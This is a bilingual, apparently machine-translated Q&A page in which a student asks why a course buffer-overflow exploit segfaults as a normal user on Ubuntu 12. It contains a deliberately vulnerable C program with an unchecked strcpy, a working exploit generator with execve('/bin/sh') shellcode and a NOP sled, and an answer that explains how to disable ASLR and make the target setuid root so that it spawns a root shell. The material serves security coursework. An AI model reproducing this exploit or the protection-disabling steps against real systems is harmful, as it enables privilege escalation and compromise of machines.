缓冲区溢出 - 在普通用户设计缺陷 [英] Buffer Overflow - SegFaults in regular user
问题描述
下面是我的code,无论是脆弱的程序(stack.c)和我的攻击(exploit.c)。这code工作在一个pre封装的Ubuntu 9的教授发出了对于Windows用户(我有一个朋友测试他的计算机上),但在Ubuntu上12,我对我的iMac上运行,我得到段错误当我尝试在一个普通用户这样做。
Below is my code, both the vulnerable program (stack.c) and my exploit (exploit.c). This code works on a pre-packaged Ubuntu 9 that the prof sent out for windows users (I had a friend test it on his computer), but on Ubuntu 12 that I run on my iMac, i get segfaults when I try and do this in a normal user.
下面的堆栈:
//stack.c
#include <stdio.h>
int bof(char *str)
{
char buffer[12];
//BO Vulnerability
strcpy(buffer,str);
return 1;
}
int main(int argc, char* argv[])
{
char str[517];
FILE *badfile;
badfile = fopen("badfile","r");
fread(str, sizeof(char),517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
和开发:
//exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 350
char code[]=
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
char *ptr;
long *a_ptr,ret;
int offset = DEFAULT_OFFSET;
int codeSize = sizeof(code);
int buffSize = sizeof(buffer);
if(argc > 1) offset = atoi(argv[1]); //allows for command line input
ptr=buffer;
a_ptr = (long *) ptr;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(buffer, 0x90, buffSize);
//----------------------BEGIN FILL BUFFER----------------------\\
ret = get_sp()+offset;
printf("Return Address: 0x%x\n",get_sp());
printf("Address: 0x%x\n",ret);
ptr = buffer;
a_ptr = (long *) ptr;
int i;
for (i = 0; i < 300;i+=4)
*(a_ptr++) = ret;
for(i = 486;i < codeSize + 486;++i)
buffer[i] = code[i-486];
buffer[buffSize - 1] = '\0';
//-----------------------END FILL BUFFER-----------------------\\
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer,517,1,badfile);
fclose(badfile);
}
要在Ubuntu的12编译这些我用:
To compile these within Ubuntu 12 I used:
gcc -o stack -fno-stack-protector -g -z execstack stack.c
gcc -o exploit exploit.c
此外,它工作在root用户,不只是一个普通的用户;
Again, it works in a root user, just not a regular user;
不管怎么说,这是由于在午夜,我一瘸一拐地我的方式,通过这个限制转让的休息,但我宁愿正确地完成它,如果有人有一个建议。想我会认输之前,在专家呼吁。我想看看,为什么,这code,不会在用户正常工作(因为它应该而且确实在旧版本的Ubuntu),但确实在根用户的工作。我需要做什么改变,使这项工作在普通用户也。
Anyways, this is due at midnight and I limped my way through the rest of the assignment with this restriction, but I'd much rather complete it properly if someone has a suggestion. Figured I'd call in the experts before throwing in the towel. I'm looking to see why, this code, will not work in a normal user (as it should, and does on older versions of ubuntu) but does work in a root user. what do i need to change to make this work in the normal user also.
推荐答案
我刚跑了code您提供一个Ubuntu的12.04虚拟机,它工作得很好。我的猜测是,你没有关闭ASLR。与被禁用ASLR再次尝试
I just ran the code that you provided on a Ubuntu 12.04 VM and it worked fine. My guess is that you didn't turn off ASLR. Try it again with ASLR disabled by either
sudo su
echo 0 > /proc/sys/kernel/randomize_va_space
exit
或
setarch `uname -i` -R ./stack
当然,以便它产卵一个root shell,您将需要先做:
of course in order for it to spawn a root shell you will need to first do:
sudo chown root:root stack
sudo chmod u+s stack
希望这有助于...
Hope this helps ...
这篇关于缓冲区溢出 - 在普通用户设计缺陷的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
